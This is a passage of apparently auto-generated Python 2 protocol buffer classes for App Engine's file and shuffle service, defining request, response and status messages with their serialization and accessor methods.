if self.has_value_: res+=prefix+("value: %s\n" % self.DebugFormatString(self.value_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kkey = 1
kvalue = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "key",
2: "value",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ReadKeyValueResponse_KeyValue'
class ReadKeyValueResponse(ProtocolBuffer.ProtocolMessage):
has_next_key_ = 0
next_key_ = ""
has_truncated_value_ = 0
truncated_value_ = 0
def __init__(self, contents=None):
self.data_ = []
if contents is not None: self.MergeFromString(contents)
def data_size(self): return len(self.data_)
def data_list(self): return self.data_
def data(self, i):
return self.data_[i]
def mutable_data(self, i):
return self.data_[i]
def add_data(self):
x = ReadKeyValueResponse_KeyValue()
self.data_.append(x)
return x
def clear_data(self):
self.data_ = []
def next_key(self): return self.next_key_
def set_next_key(self, x):
self.has_next_key_ = 1
self.next_key_ = x
def clear_next_key(self):
if self.has_next_key_:
self.has_next_key_ = 0
self.next_key_ = ""
def has_next_key(self): return self.has_next_key_
def truncated_value(self): return self.truncated_value_
def set_truncated_value(self, x):
self.has_truncated_value_ = 1
self.truncated_value_ = x
def clear_truncated_value(self):
if self.has_truncated_value_:
self.has_truncated_value_ = 0
self.truncated_value_ = 0
def has_truncated_value(self): return self.has_truncated_value_
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.data_size()): self.add_data().CopyFrom(x.data(i))
if (x.has_next_key()): self.set_next_key(x.next_key())
if (x.has_truncated_value()): self.set_truncated_value(x.truncated_value())
def Equals(self, x):
if x is self: return 1
if len(self.data_) != len(x.data_): return 0
for e1, e2 in zip(self.data_, x.data_):
if e1 != e2: return 0
if self.has_next_key_ != x.has_next_key_: return 0
if self.has_next_key_ and self.next_key_ != x.next_key_: return 0
if self.has_truncated_value_ != x.has_truncated_value_: return 0
if self.has_truncated_value_ and self.truncated_value_ != x.truncated_value_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.data_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.data_)
for i in xrange(len(self.data_)): n += self.lengthString(self.data_[i].ByteSize())
if (self.has_next_key_): n += 1 + self.lengthString(len(self.next_key_))
if (self.has_truncated_value_): n += 2
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.data_)
for i in xrange(len(self.data_)): n += self.lengthString(self.data_[i].ByteSizePartial())
if (self.has_next_key_): n += 1 + self.lengthString(len(self.next_key_))
if (self.has_truncated_value_): n += 2
return n
def Clear(self):
self.clear_data()
self.clear_next_key()
self.clear_truncated_value()
def OutputUnchecked(self, out):
for i in xrange(len(self.data_)):
out.putVarInt32(10)
out.putVarInt32(self.data_[i].ByteSize())
self.data_[i].OutputUnchecked(out)
if (self.has_next_key_):
out.putVarInt32(18)
out.putPrefixedString(self.next_key_)
if (self.has_truncated_value_):
out.putVarInt32(24)
out.putBoolean(self.truncated_value_)
def OutputPartial(self, out):
for i in xrange(len(self.data_)):
out.putVarInt32(10)
out.putVarInt32(self.data_[i].ByteSizePartial())
self.data_[i].OutputPartial(out)
if (self.has_next_key_):
out.putVarInt32(18)
out.putPrefixedString(self.next_key_)
if (self.has_truncated_value_):
out.putVarInt32(24)
out.putBoolean(self.truncated_value_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_data().TryMerge(tmp)
continue
if tt == 18:
self.set_next_key(d.getPrefixedString())
continue
if tt == 24:
self.set_truncated_value(d.getBoolean())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.data_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("data%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_next_key_: res+=prefix+("next_key: %s\n" % self.DebugFormatString(self.next_key_))
if self.has_truncated_value_: res+=prefix+("truncated_value: %s\n" % self.DebugFormatBool(self.truncated_value_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kdata = 1
knext_key = 2
ktruncated_value = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "data",
2: "next_key",
3: "truncated_value",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ReadKeyValueResponse'
class ShuffleEnums(ProtocolBuffer.ProtocolMessage):
RECORDS_KEY_VALUE_PROTO_INPUT = 1
_InputFormat_NAMES = {
1: "RECORDS_KEY_VALUE_PROTO_INPUT",
}
def InputFormat_Name(cls, x): return cls._InputFormat_NAMES.get(x, "")
InputFormat_Name = classmethod(InputFormat_Name)
RECORDS_KEY_MULTI_VALUE_PROTO_OUTPUT = 1
_OutputFormat_NAMES = {
1: "RECORDS_KEY_MULTI_VALUE_PROTO_OUTPUT",
}
def OutputFormat_Name(cls, x): return cls._OutputFormat_NAMES.get(x, "")
OutputFormat_Name = classmethod(OutputFormat_Name)
UNKNOWN = 1
RUNNING = 2
SUCCESS = 3
FAILURE = 4
INVALID_INPUT = 5
OUTPUT_ALREADY_EXISTS = 6
INCORRECT_SHUFFLE_SIZE_BYTES = 7
_Status_NAMES = {
1: "UNKNOWN",
2: "RUNNING",
3: "SUCCESS",
4: "FAILURE",
5: "INVALID_INPUT",
6: "OUTPUT_ALREADY_EXISTS",
7: "INCORRECT_SHUFFLE_SIZE_BYTES",
}
def Status_Name(cls, x): return cls._Status_NAMES.get(x, "")
Status_Name = classmethod(Status_Name)
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ShuffleEnums'
class ShuffleInputSpecification(ProtocolBuffer.ProtocolMessage):
has_format_ = 0
format_ = 1
has_path_ = 0
path_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def format(self): return self.format_
def set_format(self, x):
self.has_format_ = 1
self.format_ = x
def clear_format(self):
if self.has_format_:
self.has_format_ = 0
self.format_ = 1
def has_format(self): return self.has_format_
def path(self): return self.path_
def set_path(self, x):
self.has_path_ = 1
self.path_ = x
def clear_path(self):
if self.has_path_:
self.has_path_ = 0
self.path_ = ""
def has_path(self): return self.has_path_
def MergeFrom(self, x):
assert x is not self
if (x.has_format()): self.set_format(x.format())
if (x.has_path()): self.set_path(x.path())
def Equals(self, x):
if x is self: return 1
if self.has_format_ != x.has_format_: return 0
if self.has_format_ and self.format_ != x.format_: return 0
if self.has_path_ != x.has_path_: return 0
if self.has_path_ and self.path_ != x.path_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_path_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: path not set.')
return initialized
def ByteSize(self):
n = 0
if (self.has_format_): n += 1 + self.lengthVarInt64(self.format_)
n += self.lengthString(len(self.path_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_format_): n += 1 + self.lengthVarInt64(self.format_)
if (self.has_path_):
n += 1
n += self.lengthString(len(self.path_))
return n
def Clear(self):
self.clear_format()
self.clear_path()
def OutputUnchecked(self, out):
if (self.has_format_):
out.putVarInt32(8)
out.putVarInt32(self.format_)
out.putVarInt32(18)
out.putPrefixedString(self.path_)
def OutputPartial(self, out):
if (self.has_format_):
out.putVarInt32(8)
out.putVarInt32(self.format_)
if (self.has_path_):
out.putVarInt32(18)
out.putPrefixedString(self.path_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_format(d.getVarInt32())
continue
if tt == 18:
self.set_path(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_format_: res+=prefix+("format: %s\n" % self.DebugFormatInt32(self.format_))
if self.has_path_: res+=prefix+("path: %s\n" % self.DebugFormatString(self.path_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kformat = 1
kpath = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "format",
2: "path",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ShuffleInputSpecification'
class ShuffleOutputSpecification(ProtocolBuffer.ProtocolMessage):
has_format_ = 0
format_ = 1
def __init__(self, contents=None):
self.path_ = []
if contents is not None: self.MergeFromString(contents)
def format(self): return self.format_
def set_format(self, x):
self.has_format_ = 1
self.format_ = x
def clear_format(self):
if self.has_format_:
self.has_format_ = 0
self.format_ = 1
def has_format(self): return self.has_format_
def path_size(self): return len(self.path_)
def path_list(self): return self.path_
def path(self, i):
return self.path_[i]
def set_path(self, i, x):
self.path_[i] = x
def add_path(self, x):
self.path_.append(x)
def clear_path(self):
self.path_ = []
def MergeFrom(self, x):
assert x is not self
if (x.has_format()): self.set_format(x.format())
for i in xrange(x.path_size()): self.add_path(x.path(i))
def Equals(self, x):
if x is self: return 1
if self.has_format_ != x.has_format_: return 0
if self.has_format_ and self.format_ != x.format_: return 0
if len(self.path_) != len(x.path_): return 0
for e1, e2 in zip(self.path_, x.path_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_format_): n += 1 + self.lengthVarInt64(self.format_)
n += 1 * len(self.path_)
for i in xrange(len(self.path_)): n += self.lengthString(len(self.path_[i]))
return n
def ByteSizePartial(self):
n = 0
if (self.has_format_): n += 1 + self.lengthVarInt64(self.format_)
n += 1 * len(self.path_)
for i in xrange(len(self.path_)): n += self.lengthString(len(self.path_[i]))
return n
def Clear(self):
self.clear_format()
self.clear_path()
def OutputUnchecked(self, out):
if (self.has_format_):
out.putVarInt32(8)
out.putVarInt32(self.format_)
for i in xrange(len(self.path_)):
out.putVarInt32(18)
out.putPrefixedString(self.path_[i])
def OutputPartial(self, out):
if (self.has_format_):
out.putVarInt32(8)
out.putVarInt32(self.format_)
for i in xrange(len(self.path_)):
out.putVarInt32(18)
out.putPrefixedString(self.path_[i])
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_format(d.getVarInt32())
continue
if tt == 18:
self.add_path(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_format_: res+=prefix+("format: %s\n" % self.DebugFormatInt32(self.format_))
cnt=0
for e in self.path_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("path%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kformat = 1
kpath = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "format",
2: "path",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ShuffleOutputSpecification'
class ShuffleRequest_Callback(ProtocolBuffer.ProtocolMessage):
has_url_ = 0
url_ = ""
has_app_version_id_ = 0
app_version_id_ = ""
has_method_ = 0
method_ = "POST"
has_queue_ = 0
queue_ = "default"
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def url(self): return self.url_
def set_url(self, x):
self.has_url_ = 1
self.url_ = x
def clear_url(self):
if self.has_url_:
self.has_url_ = 0
self.url_ = ""
def has_url(self): return self.has_url_
def app_version_id(self): return self.app_version_id_
def set_app_version_id(self, x):
self.has_app_version_id_ = 1
self.app_version_id_ = x
def clear_app_version_id(self):
if self.has_app_version_id_:
self.has_app_version_id_ = 0
self.app_version_id_ = ""
def has_app_version_id(self): return self.has_app_version_id_
def method(self): return self.method_
def set_method(self, x):
self.has_method_ = 1
self.method_ = x
def clear_method(self):
if self.has_method_:
self.has_method_ = 0
self.method_ = "POST"
def has_method(self): return self.has_method_
def queue(self): return self.queue_
def set_queue(self, x):
self.has_queue_ = 1
self.queue_ = x
def clear_queue(self):
if self.has_queue_:
self.has_queue_ = 0
self.queue_ = "default"
def has_queue(self): return self.has_queue_
def MergeFrom(self, x):
assert x is not self
if (x.has_url()): self.set_url(x.url())
if (x.has_app_version_id()): self.set_app_version_id(x.app_version_id())
if (x.has_method()): self.set_method(x.method())
if (x.has_queue()): self.set_queue(x.queue())
def Equals(self, x):
if x is self: return 1
if self.has_url_ != x.has_url_: return 0
if self.has_url_ and self.url_ != x.url_: return 0
if self.has_app_version_id_ != x.has_app_version_id_: return 0
if self.has_app_version_id_ and self.app_version_id_ != x.app_version_id_: return 0
if self.has_method_ != x.has_method_: return 0
if self.has_method_ and self.method_ != x.method_: return 0
if self.has_queue_ != x.has_queue_: return 0
if self.has_queue_ and self.queue_ != x.queue_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_url_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: url not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.url_))
if (self.has_app_version_id_): n += 1 + self.lengthString(len(self.app_version_id_))
if (self.has_method_): n += 1 + self.lengthString(len(self.method_))
if (self.has_queue_): n += 1 + self.lengthString(len(self.queue_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_url_):
n += 1
n += self.lengthString(len(self.url_))
if (self.has_app_version_id_): n += 1 + self.lengthString(len(self.app_version_id_))
if (self.has_method_): n += 1 + self.lengthString(len(self.method_))
if (self.has_queue_): n += 1 + self.lengthString(len(self.queue_))
return n
def Clear(self):
self.clear_url()
self.clear_app_version_id()
self.clear_method()
self.clear_queue()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.url_)
if (self.has_app_version_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_version_id_)
if (self.has_method_):
out.putVarInt32(26)
out.putPrefixedString(self.method_)
if (self.has_queue_):
out.putVarInt32(34)
out.putPrefixedString(self.queue_)
def OutputPartial(self, out):
if (self.has_url_):
out.putVarInt32(10)
out.putPrefixedString(self.url_)
if (self.has_app_version_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_version_id_)
if (self.has_method_):
out.putVarInt32(26)
out.putPrefixedString(self.method_)
if (self.has_queue_):
out.putVarInt32(34)
out.putPrefixedString(self.queue_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_url(d.getPrefixedString())
continue
if tt == 18:
self.set_app_version_id(d.getPrefixedString())
continue
if tt == 26:
self.set_method(d.getPrefixedString())
continue
if tt == 34:
self.set_queue(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_url_: res+=prefix+("url: %s\n" % self.DebugFormatString(self.url_))
if self.has_app_version_id_: res+=prefix+("app_version_id: %s\n" % self.DebugFormatString(self.app_version_id_))
if self.has_method_: res+=prefix+("method: %s\n" % self.DebugFormatString(self.method_))
if self.has_queue_: res+=prefix+("queue: %s\n" % self.DebugFormatString(self.queue_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kurl = 1
kapp_version_id = 2
kmethod = 3
kqueue = 4
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "url",
2: "app_version_id",
3: "method",
4: "queue",
}, 4)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
}, 4, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ShuffleRequest_Callback'
class ShuffleRequest(ProtocolBuffer.ProtocolMessage):
has_shuffle_name_ = 0
shuffle_name_ = ""
has_output_ = 0
has_shuffle_size_bytes_ = 0
shuffle_size_bytes_ = 0
has_callback_ = 0
def __init__(self, contents=None):
self.input_ = []
self.output_ = ShuffleOutputSpecification()
self.callback_ = ShuffleRequest_Callback()
if contents is not None: self.MergeFromString(contents)
def shuffle_name(self): return self.shuffle_name_
def set_shuffle_name(self, x):
self.has_shuffle_name_ = 1
self.shuffle_name_ = x
def clear_shuffle_name(self):
if self.has_shuffle_name_:
self.has_shuffle_name_ = 0
self.shuffle_name_ = ""
def has_shuffle_name(self): return self.has_shuffle_name_
def input_size(self): return len(self.input_)
def input_list(self): return self.input_
def input(self, i):
return self.input_[i]
def mutable_input(self, i):
return self.input_[i]
def add_input(self):
x = ShuffleInputSpecification()
self.input_.append(x)
return x
def clear_input(self):
self.input_ = []
def output(self): return self.output_
def mutable_output(self): self.has_output_ = 1; return self.output_
def clear_output(self):self.has_output_ = 0; self.output_.Clear()
def has_output(self): return self.has_output_
def shuffle_size_bytes(self): return self.shuffle_size_bytes_
def set_shuffle_size_bytes(self, x):
self.has_shuffle_size_bytes_ = 1
self.shuffle_size_bytes_ = x
def clear_shuffle_size_bytes(self):
if self.has_shuffle_size_bytes_:
self.has_shuffle_size_bytes_ = 0
self.shuffle_size_bytes_ = 0
def has_shuffle_size_bytes(self): return self.has_shuffle_size_bytes_
def callback(self): return self.callback_
def mutable_callback(self): self.has_callback_ = 1; return self.callback_
def clear_callback(self):self.has_callback_ = 0; self.callback_.Clear()
def has_callback(self): return self.has_callback_
def MergeFrom(self, x):
assert x is not self
if (x.has_shuffle_name()): self.set_shuffle_name(x.shuffle_name())
for i in xrange(x.input_size()): self.add_input().CopyFrom(x.input(i))
if (x.has_output()): self.mutable_output().MergeFrom(x.output())
if (x.has_shuffle_size_bytes()): self.set_shuffle_size_bytes(x.shuffle_size_bytes())
if (x.has_callback()): self.mutable_callback().MergeFrom(x.callback())
def Equals(self, x):
if x is self: return 1
if self.has_shuffle_name_ != x.has_shuffle_name_: return 0
if self.has_shuffle_name_ and self.shuffle_name_ != x.shuffle_name_: return 0
if len(self.input_) != len(x.input_): return 0
for e1, e2 in zip(self.input_, x.input_):
if e1 != e2: return 0
if self.has_output_ != x.has_output_: return 0
if self.has_output_ and self.output_ != x.output_: return 0
if self.has_shuffle_size_bytes_ != x.has_shuffle_size_bytes_: return 0
if self.has_shuffle_size_bytes_ and self.shuffle_size_bytes_ != x.shuffle_size_bytes_: return 0
if self.has_callback_ != x.has_callback_: return 0
if self.has_callback_ and self.callback_ != x.callback_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_shuffle_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: shuffle_name not set.')
for p in self.input_:
if not p.IsInitialized(debug_strs): initialized=0
if (not self.has_output_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: output not set.')
elif not self.output_.IsInitialized(debug_strs): initialized = 0
if (not self.has_shuffle_size_bytes_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: shuffle_size_bytes not set.')
if (not self.has_callback_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: callback not set.')
elif not self.callback_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.shuffle_name_))
n += 1 * len(self.input_)
for i in xrange(len(self.input_)): n += self.lengthString(self.input_[i].ByteSize())
n += self.lengthString(self.output_.ByteSize())
n += self.lengthVarInt64(self.shuffle_size_bytes_)
n += self.lengthString(self.callback_.ByteSize())
return n + 4
def ByteSizePartial(self):
n = 0
if (self.has_shuffle_name_):
n += 1
n += self.lengthString(len(self.shuffle_name_))
n += 1 * len(self.input_)
for i in xrange(len(self.input_)): n += self.lengthString(self.input_[i].ByteSizePartial())
if (self.has_output_):
n += 1
n += self.lengthString(self.output_.ByteSizePartial())
if (self.has_shuffle_size_bytes_):
n += 1
n += self.lengthVarInt64(self.shuffle_size_bytes_)
if (self.has_callback_):
n += 1
n += self.lengthString(self.callback_.ByteSizePartial())
return n
def Clear(self):
self.clear_shuffle_name()
self.clear_input()
self.clear_output()
self.clear_shuffle_size_bytes()
self.clear_callback()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.shuffle_name_)
for i in xrange(len(self.input_)):
out.putVarInt32(18)
out.putVarInt32(self.input_[i].ByteSize())
self.input_[i].OutputUnchecked(out)
out.putVarInt32(26)
out.putVarInt32(self.output_.ByteSize())
self.output_.OutputUnchecked(out)
out.putVarInt32(32)
out.putVarInt64(self.shuffle_size_bytes_)
out.putVarInt32(42)
out.putVarInt32(self.callback_.ByteSize())
self.callback_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_shuffle_name_):
out.putVarInt32(10)
out.putPrefixedString(self.shuffle_name_)
for i in xrange(len(self.input_)):
out.putVarInt32(18)
out.putVarInt32(self.input_[i].ByteSizePartial())
self.input_[i].OutputPartial(out)
if (self.has_output_):
out.putVarInt32(26)
out.putVarInt32(self.output_.ByteSizePartial())
self.output_.OutputPartial(out)
if (self.has_shuffle_size_bytes_):
out.putVarInt32(32)
out.putVarInt64(self.shuffle_size_bytes_)
if (self.has_callback_):
out.putVarInt32(42)
out.putVarInt32(self.callback_.ByteSizePartial())
self.callback_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_shuffle_name(d.getPrefixedString())
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_input().TryMerge(tmp)
continue
if tt == 26:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_output().TryMerge(tmp)
continue
if tt == 32:
self.set_shuffle_size_bytes(d.getVarInt64())
continue
if tt == 42:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_callback().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_shuffle_name_: res+=prefix+("shuffle_name: %s\n" % self.DebugFormatString(self.shuffle_name_))
cnt=0
for e in self.input_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("input%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_output_:
res+=prefix+"output <\n"
res+=self.output_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_shuffle_size_bytes_: res+=prefix+("shuffle_size_bytes: %s\n" % self.DebugFormatInt64(self.shuffle_size_bytes_))
if self.has_callback_:
res+=prefix+"callback <\n"
res+=self.callback_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kshuffle_name = 1
kinput = 2
koutput = 3
kshuffle_size_bytes = 4
kcallback = 5
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "shuffle_name",
2: "input",
3: "output",
4: "shuffle_size_bytes",
5: "callback",
}, 5)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.NUMERIC,
5: ProtocolBuffer.Encoder.STRING,
}, 5, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ShuffleRequest'
class ShuffleResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ShuffleResponse'
class GetShuffleStatusRequest(ProtocolBuffer.ProtocolMessage):
has_shuffle_name_ = 0
shuffle_name_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def shuffle_name(self): return self.shuffle_name_
def set_shuffle_name(self, x):
self.has_shuffle_name_ = 1
self.shuffle_name_ = x
def clear_shuffle_name(self):
if self.has_shuffle_name_:
self.has_shuffle_name_ = 0
self.shuffle_name_ = ""
def has_shuffle_name(self): return self.has_shuffle_name_
def MergeFrom(self, x):
assert x is not self
if (x.has_shuffle_name()): self.set_shuffle_name(x.shuffle_name())
def Equals(self, x):
if x is self: return 1
if self.has_shuffle_name_ != x.has_shuffle_name_: return 0
if self.has_shuffle_name_ and self.shuffle_name_ != x.shuffle_name_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_shuffle_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: shuffle_name not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.shuffle_name_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_shuffle_name_):
n += 1
n += self.lengthString(len(self.shuffle_name_))
return n
def Clear(self):
self.clear_shuffle_name()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.shuffle_name_)
def OutputPartial(self, out):
if (self.has_shuffle_name_):
out.putVarInt32(10)
out.putPrefixedString(self.shuffle_name_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_shuffle_name(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_shuffle_name_: res+=prefix+("shuffle_name: %s\n" % self.DebugFormatString(self.shuffle_name_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kshuffle_name = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "shuffle_name",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
